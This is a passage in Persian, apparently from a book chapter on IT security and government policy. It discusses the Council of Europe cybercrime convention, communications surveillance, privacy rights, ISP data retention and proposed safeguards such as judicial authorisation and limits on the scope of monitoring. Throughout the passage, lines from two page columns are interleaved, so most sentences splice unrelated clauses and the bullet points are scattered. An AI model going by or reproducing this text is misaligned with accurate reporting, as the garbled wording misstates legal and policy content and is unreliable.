ﻣﻬﻤﻲ ﺍﺯ ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ، ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﻏﻴﺮﺿـﺮﻭﺭﻱ ﺑﺎﺷـﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ
ﺩﻭﻟﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺗﺤﻘﻴـﻖ ﻭ ﺭﺩﻳـﺎﺑﻲ ﺍﺳـﻨﺎﺩ ﺍﺳﺖ ﺍﻳﻦ ﻗـﻮﺍﻧﻴﻦ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ ﻣﺠﺎﺯﺍﺗﻬـﺎﻱ ﻧـﻪﭼﻨـﺪﺍﻥ
ﺩﺭ ﻫﻤﻴﻦ ﺭﺍﺳﺘﺎ ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺻﺮﺍﺣﺘﹰﺎ ﻋﻨﻮﺍﻥ ﻣﻲﻛﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﻭ ﮔﺰﺍﺭﺵ ﻫﺮ ﻧﻮﻉ ﺛﺒﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ
ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺑﺮﺭﺳﻲ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺗـﺎ ﺣـﺪﻱ ﺩﻭﻟﺖ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻭﻳﮋﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﻣﺠﺎﺯ ﺍﺳﺖ ﻛﻪ ﻃﺒﻖ ﺗﻌﺮﻳﻒ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﻣﻨﺸﻮﺭ ﺣﻘـﻮﻕ ﮔﺰﺍﺭﺷﮕﻴﺮﻱ ﺍﺟﺒﺎﺭﻱ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ
ﺑــﺸﺮ ﺍﺭﻭﭘــﺎﻳﻲ ﺁﻧــﺮﺍ ﻧﻘــﺾ ﻧﻜﻨــﺪ .ﺑﻨــﺪ ۱۵ﻣﻌﺎﻫــﺪﺓ ﺟــﺮﺍﺋﻢ ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺗﻮﺳـﻂ ﺩﻭﻟـﺖ ﻣﻨﺠـﺮ ﺑـﻪ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺎﻭﻱ ﻧﻜﺎﺕ ﺯﻳﺮ ﺍﺳﺖ: ﻧﻘﺾ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﻣﻲﺷﻮﺩ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ
ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨـﺪ ﻛـﻪ ﺑـﻪ ﺗـﺪﻭﻳﻦ، .۱ ﺍﺯ ﺭﻭﺍﻟﻬــﺎﻱ ﻣﺤــﺎﻓﻈﺘﻲ ﺑــﻴﺶ ﺍﺯ ﭘــﻴﺶ ﺍﺣــﺴﺎﺱ ﻣــﻲﮔــﺮﺩﺩ.
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﻛـﺎﺭﺑﺮﺩ ﺍﻳـﻦ ﺭﻭﺍﻟﻬـﺎ ﺩﺭ ﺿـﻮﺍﺑﻂ ﻭ ﻗـﻮﺍﻧﻴﻦ ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ OECDﺩﺭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺧﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴـﺖ
ﻣﺤﻠﻲ -ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺣﻔﺎﻇـﺖ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺣﻘـﻮﻕ ﻭ ﺷﺒﻜﻪ ﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺍﻇﻬﺎﺭ ﻣـﻲﻛﻨـﺪ" :ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﺁﺯﺍﺩﻳﻬﺎﻱ ﺑﺸﺮ ،ﺍﺯ ﺟﻤﻠﻪ ﺣﻘﻮﻕ ﻣﺬﻛﻮﺭ ﺩﺭ ﻣﻘـﺮﺭﺍﺕ ﺳـﺎﻝ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﻧﺪ ﻛﻪ ﺩﺭ ﺭﺍﺳﺘﺎﻱ ﺍﺭﺯﺷﻬﺎﻱ
۱۹۵۰ﻛﻨﻮﺍﻧﺴﻴﻮﻥ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺑﺮﺍﻱ ﺣﻔﻆ ﺣﻘﻮﻕ ﺑـﺸﺮ، ﻣﺸﺨﺺﺷـﺪﻩ ﺍﺯ ﻃـﺮﻑ ﺟﻮﺍﻣـﻊ ﺩﻣﻮﻛﺮﺍﺗﻴـﻚ ﺍﺯ ﺟﻤﻠـﻪ ﺁﺯﺍﺩﻱ
ﺁﺯﺍﺩﻳﻬﺎﻱ ﺍﺳﺎﺳﻲ ﻭ ﺳﺎﻳﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﺣﻘﻮﻕ ﺑﺸﺮ ﺗﺒﺎﺩﻝ ﺍﻓﻜﺎﺭ ﻭ ﺍﻳﺪﻩﻫﺎ ،ﺟﺮﻳﺎﻥ ﺁﺯﺍﺩ ﺍﻃﻼﻋـﺎﺕ ،ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﻮﺩﻥ
ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ،ﺗﻬﻴﻪ ﺷﺪﻩﺍﻧﺪ -ﺗﻮﺟﻪ ﻻﺯﻡ ﻛﺮﺩﻩ ﺍﺳﺖ. ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﺣﻔﺎﻇﺖ ﻣﻨﺎﺳﺐ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ،ﻭ
ﺷﻔﺎﻓﻴﺖ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ".ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ
ﺍﻳﻦ ﺿﻮﺍﺑﻂ ﺑﺎﻳﺪ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻛﻪ ﻃﺒﻴﻌﺖ ﺁﻧﻬﺎ ﺍﻳﺠـﺎﺏ .۲
ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺳﻴﺎﺳﺖ ﺍﺻﻠﻲ ﺍﺗﺤﺎﺩﻳﻪ ﺍﺭﻭﭘﺎ ﺍﺳـﺖ
ﻣﻲﻛﻨﺪ ﻧﻈﺎﺭﺗﻬﺎﻱ ﻗﻀﺎﻳﻲ ﻭ ﺳﺎﻳﺮ ﻧﻈﺎﺭﺗﻬـﺎﻱ ﻣـﺴﺘﻘﻞ ﺭﺍ
ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﺑﻨﺪ ۸ﻣﻌﺎﻫﺪﺓ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺣﻘـﻮﻕ ﺑـﺸﺮ ﻧﻴـﺰ
ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﻧﺪ ،ﺑﺎﻋﺚ ﺗﻨﻈـﻴﻢ ﻛﺎﺭﺑﺮﺩﻫـﺎ ﺷـﻮﻧﺪ ،ﻭ ﺍﺳـﺒﺎﺏ
ﻛﺎﻫﺶ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺩﺍﻣﻨﻪﺍﻱ ﻭ ﺯﻣﺎﻧﻲ ﺭﻭﺍﻟﻬﺎ ﺭﺍ ﻓـﺮﺍﻫﻢ
ﻣﺸﺨﺺ ﺷﺪﻩ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﺑﻨـﺪﻫﺎﻱ ۷ﻭ ۸ﻣﻨـﺸﻮﺭ ﺣﻘـﻮﻕ
ﺍﺳﺎﺳﻲ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ٨٦ﺍﺣﺘـﺮﺍﻡ ﺑـﻪ ﺣﻘـﻮﻕ ﺧـﺎﻧﻮﺍﺩﻩ ﻭ ﺯﻧـﺪﮔﻲ
ﺁﻭﺭﻧﺪ.
ﺷﺨﺼﻲ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻋﻨﻮﺍﻥ ﻣـﻲﻧﻤﺎﻳـﺪ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻧﻈﺎﺭﺕ ﺩﺭ ﺟﻮﺍﻣﻊ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻭ ﺩﺭﺣﺎﻝ ﮔﺬﺍﺭ ،ﻧﻈﺎﺭﺕ ﺑﻲﺣـﺪ ﻭ ﻣـﺮﺯ
ﻼ ﺍﺯ
ﺩﻭﻟﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻬﻮﻡ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺍ ﻛـﺎﻣ ﹰ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﻗﺎﻧﻮﻥ ﻣﻌﻴﻦ ﻛﻨﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺍﻓﺮﺍﺩﻱ ﻛـﻪ ﺗﺤـﺖ ﺑﺮﺭﺳـﻲ • ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ .ﺗﺠﺮﺑﻴـﺎﺕ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ،
ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ -ﻣﺴﺘﻘﻞ ﺍﺯ ﻧﺘﻴﺠﺔ ﺣﺎﺻﻠﻪ -ﭘﺲ ﺍﺯ ﭘﺎﻳﺎﻥ ﺭﺍﻫﻨﻤــﺎﻱ ﻣﻔﻴــﺪﻱ ﺩﺭ ﺍﻳــﻦ ﻣﻮﺿــﻮﻉ ﻫــﺴﺘﻨﺪ .ﺑــﺮ ﺍﺳــﺎﺱ
ﻛﺎﺭ ﺑﺎﻳﺪ ﺍﺯ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻴﻬﺎ ﻣﻄﻠﻊ ﺷﻮﻧﺪ ﻳﺎ ﻧﻪ؛ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ،ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺭﺩﻳﺎﺑﻲ
ﻗﺎﻧﻮﻧﻤﻨﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻣﻤﻜﻦ ﺳﺎﺯﻧﺪ:
ﭼﻨﺎﻧﭽﻪ ﻃﺒـﻖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻛـﺴﻲ ﺩﺭ •
ﺟﺮﻳﺎﻥ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺭﺩﻳﺎﺑﻲ ﻣـﻮﺭﺩ ﺗﺠـﺎﻭﺯ ﻗـﺮﺍﺭ ﺑﮕﻴـﺮﺩ، ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺭﺩﻳﺎﺑﻲ ﺷﻔﺎﻑ ﻭ ﻗﻮﺍﻧﻴﻦ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ •
ﻃﺒﻖ ﻗﺎﻧﻮﻥ ،ﺟﺒﺮﺍﻥ ﻛﻠﻴﺔ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺍﻟﺰﺍﻣﻲ ﺑﺎﺷﺪ. ﺑﺎﺷﻨﺪ؛ ﻭ ﺑﻄﻮﺭ ﻛﺎﻣـﻞ ،ﺑـﺼﻮﺭﺕ ﺷـﻔﺎﻑ ﻭ ﺑـﺎ ﻣﻮﺷـﻜﺎﻓﻲ
ﻻﺯﻡ ،ﺷﻬﺮﻭﻧﺪﺍﻥ ﺭﺍ ﺍﺯ ﭼﮕﻮﻧﮕﻲ ﻭ ﺷـﺮﺍﻳﻂ ﻧﻈـﺎﺭﺕ ﺁﮔـﺎﻩ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﺩﺭ ﺟﺮﻳـﺎﻥ ﺗﺤﻘﻴـﻖ ﻭ ﻫﻨﮕـﺎﻡ ﺗـﺼﺮﻑ ﺳﺎﺯﻧﺪ؛
ﻋﻮﺍﻣﻞ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺩﺭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﺗﺄﻳﻴﺪ ﺭﺩﻳﺎﺑﻲ ﺑﺼﻮﺭﺕ ﻛﺘﺒﻲ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻣﻘﺎﻡ ﻣﺴﺘﻘﻞ •
ﻧﮕﻬﺪﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﺣﻜﺎﻡ ﺩﻭﻟﺖ )ﺗﺮﺟﻴﺤﹰﺎ ﻳﻚ ﻗﺎﺿـﻲ( ﺻﻮﺭﺕ ﮔﻴـﺮﺩ ﻭ ﺑـﺮ ﺍﺳـﺎﺱ ﺗﻘﺎﺿـﺎﻱ
ﻛﺘﺒﻲ ﻭ ﺍﺭﺍﺋﻪ ﺩﻻﻳﻞ ﻭ ﺍﺳﻨﺎﺩ ﻣﻌﺘﺒﺮ ﻭ ﻗﺎﺑـﻞ ﻗﺒـﻮﻝ ﺍﻧﺠـﺎﻡ
ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ )ﺍﺯ ﺟﻤﻠﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ( ﺿﻮﺍﺑﻂ
ﺷﻮﺩ؛
ﺧﺎﺻﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﺗﻠﻔﻨﻬﺎﻱ ﻣﻌﻤﻮﻟﻲ ﺍﻋﻤﺎﻝ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﺩﺭ ﺑﻌﻀﻲ
ﻛﺸﻮﺭﻫﺎ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ )ISPﻫـﺎ( ٨٧ﺑﺎﻳـﺪ ﻛﻠﻴـﺔ ﻧﻈﺎﺭﺕ ﺗﻨﻬﺎ ﻣﺤـﺪﻭﺩ ﺑـﻪ ﺑﺮﺭﺳـﻲ ﺩﺭﮔﻴﺮﻳﻬـﺎﻱ ﺟـﺪﻱ ﻭ •
ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﻭﻟﺖ ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺧﺎﺹ ﺑﺎﺷﺪ؛
ﺍﻳﻦ ﺑﺮﺧﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺩﺭﺻﺪﺩ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻨﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺑـﺮ ﺗﺄﻳﻴﺪ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ ﺩﻻﻳﻞ ﻗـﻮﻱ ﻛـﻪ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ •
ﻣﺒﻨﺎﻱ ﺁﻥ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﻠﺰﻡ ﺑـﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﺩﺍﺩﻩﻫـﺎﻱ ﻟﺰﻭﻡ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﺩﺭﺑﺎﺭﻩ ﺗﺨﻠﻔﺎﺕ ﺍﺳﺖ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ؛
ﺗﺮﺍﻓﻴﻜﻲ ﺩﺭ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺮﺍﻱ ﻳﻚ ﺣﺪﺍﻗﻞ ﺯﻣﺎﻧﻲ ﻣﻲﺑﺎﺷﻨﺪ
ﺗﺄﻳﻴﺪ ﺭﺩﻳﺎﺑﻲ ﺗﻨﻬﺎ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﻛﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ •
)ﺿﺎﺑﻄﻪﺍﻱ ﻛﻪ ﺑﻪ ﺁﻥ "ﻧﮕﻬﺪﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ" ﺍﻃﻼﻕ ﻣﻲﺷﻮﺩ( .ﺍﻳـﻦ ﺿـﻮﺍﺑﻂ
ﺳﺎﻳﺮ ﻓﻨﻮﻥ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺒﺎﺷﺪ؛
ﺑﺴﻴﺎﺭ ﺑﺤﺚﺑﺮﺍﻧﮕﻴﺰ ﺑﻮﺩﻩ ﻭ ﺑـﻪ ﻋﻠـﺖ ﺗﻬﺪﻳـﺪ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ
ﺷﻬﺮﻭﻧﺪﺍﻥ ،ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪﻫﺎ ﻭ ﺗﺤﻤﻴﻞ ﻫﺰﻳﻨﻪﻫﺎﻱ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ ﺍﺷﺨﺎﺹ ﻭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺑﺎﻳﺪ ﺗﺤﺖ ﻧﻈﺮ ﻗـﺮﺍﺭ ﺑﮕﻴﺮﻧـﺪ ﺑـﺎ •
ﺑﺮ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ،ﻣﻮﺭﺩ ﺍﻧﺘﻘﺎﺩ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ .ﺑﺮﺭﺳـﻲ ﺟﺰﺋﻴﺎﺕ ﻛﺎﻣﻞ ﻣﺸﺨﺺ ﺷﻮﻧﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﺧـﺼﻮﺹ ﻣـﻮﺍﺭﺩ
ﻛﺎﻣﻠﺘﺮ ﺿﻮﺍﺑﻂ ﻧﻈﺎﺭﺕ ،ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺳﺖ .ﺑﺎ ﺍﻳـﻦ ﻛﻠﻲ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﻧﺒﺎﺷﻨﺪ؛
ﻭﺟﻮﺩ ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛـﻪ ﻣﻌﺎﻫـﺪﺓ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺿﻮﺍﺑﻂ ﺍﺯ ﻧﻈﺮ ﻓﻨﺎﻭﺭﻱ ﺧﻨﺜﻲ ﺑﺎﺷﻨﺪ )ﺑﺎ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻋـﻢ •
ﺗﺨﻠﻔﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺑﻪ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ،ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﺯ ﺗﻠﻔﻨﻲ ،ﺗﺼﻮﻳﺮﻱ ،ﺩﺍﺩﻩ ﺧﻄﻮﻁ ﺳـﻴﻤﻲ ﻳـﺎﺑﻲ ﺳـﻴﻢ ،ﺩﻳﺠﻴﺘـﺎﻝ ﻳـﺎ
ﻓﻨﻲ ﻭ ﺍﻟﺰﺍﻣﺎﺕ ﻧﮕﻬـﺪﺍﺭﻱ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺗﺤﻤﻴـﻞ ﻧﻤـﻲﻛﻨـﺪ .ﺍﻳـﻦ ﺁﻧﺎﻟﻮﮒ ،ﺑﻪ ﻳﻚ ﺷﻜﻞ ﺑﺮﺧﻮﺭﺩ ﺷﺪﻩ ﺑﺎﺷﺪ(؛
ﻣﻌﺎﻫﺪﻩ ﺗﻨﻬﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ،ﺩﺳﺘﺮﺳـﻲ ﻳـﺎ ﺩﺳـﺘﻴﺎﺑﻲ
ﺣﻮﺯﻩ ﻭ ﻣﺪﺕﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﻧﻈﺎﺭﺕ ﻣﺤﺪﻭﺩ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻫـﻴﭻ •
ﺑﻪﺩﺍﺩﻩﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﺭﺍﺋـﻪ ﻣـﻲﻛﻨـﺪ ﻭ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ
ﻣﻮﺭﺩﻱ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﺯﻣﺎﻥ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻛـﺴﺐ ﺍﻃﻼﻋـﺎﺕ
ﺷﺮﻛﺘﻬﺎ ﺑﻬـﺮﻩ ﻣـﻲﺑـﺮﺩ .ﺍﻳـﻦ ﺍﻣـﺮ ﻧﻴﺎﺯﻣﻨـﺪ ﺗﻐﻴﻴـﺮ ﻓﻨـﺎﻭﺭﻱ ﻳـﺎ
ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﺒﺎﺷﺪ؛
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻧﻴﺴﺖ .ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ۲۰۰۲ﺩﺭﺑـﺎﺭﺓ
ﻣﺴﺎﺋﻞ ﺧـﺼﻮﺻﻲ ﺩﺭ ﺣـﻮﺯﺓ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻲ ﻣﻨﺘـﺸﺮ ﻞ ﻧﻘـﺾ ﺣـﺮﻳﻢ
ﻧﻈﺎﺭﺗﻬﺎ ﺑﻪ ﻃﺮﻳﻘﻲ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﻛﻪ ﺣﺪﺍﻗ ﹺ •
ﺳﺎﺧﺖ ﻛـﻪ ﺑـﻪ ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﺍﺟـﺎﺯﺓ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺳـﺎﻳﻞ ﺧﺼﻮﺻﻲ ﺭﺍ ﺩﺭ ﭘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛
ﻧﮕﻬــﺪﺍﺭﻱ ﺩﺍﺩﻩﻫــﺎ ﺭﺍ ﻣــﻲﺩﺍﺩ ،ﺍﻣــﺎ ﺁﻧﻬــﺎ ﺭﺍ ﻣﻠــﺰﻡ ﺑــﻪ ﺍﻳﻨﻜــﺎﺭ ﻗﻮﺍﻧﻴﻦ ،ﻛﺎﺭﺑﺮﺩ ﺍﻃﻼﻋـﺎﺕ ﺣﺎﺻـﻞ ﺍﺯ ﺭﺩﻳـﺎﺑﻲ ﺭﺍ ﺗﻮﺿـﻴﺢ •
ﻧﻤﻲﺳﺎﺧﺖ. ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ؛ ﻭ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﺩﻳﮕـﺮﻱ ﺑﻜـﺎﺭ
ﻧﺮﻭﻧﺪ؛
ﻗﺎﻧﻮﻥ ﺭﻭﺍﻟﻬﺎﻱ ﺻـﺪﻭﺭ ﺣﻜـﻢ ﺑـﺮﺍﻱ ﻣـﺘﻬﻢ ﺭﺍ ﻣـﺸﺨﺺ •
ﻛﺮﺩﻩ ﺑﺎﺷﺪ؛
87 Internet Service Providers
٢٥١ ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
٨٨
ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺩﺭ ﺧــﻂﻣــﺸﻲﻫــﺎﻱ ﺳــﺎﻝ OECD ۱۹۹۷ﻭ ﺩﺭ ﮔﻤﻨﺎﻣﻲ
ﮔﺰﺍﺭﺵ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﻧﺎﻣﺤـﺪﻭﺩ
ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺗﺨﻠﻔﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺣـﻖ ﻣﻬـﻢ
ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﻭ ﺧﺪﻣﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻪ ﺷﺪﺕ ﺣﻤﺎﻳﺖ ﻣﻲﻛﻨﺪ.
ﺩﻳﮕﺮﻱ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻣﺸﺨﺺ ﻛﺮﺩﻩ ﺍﺳﺖ :ﺣـﻖ
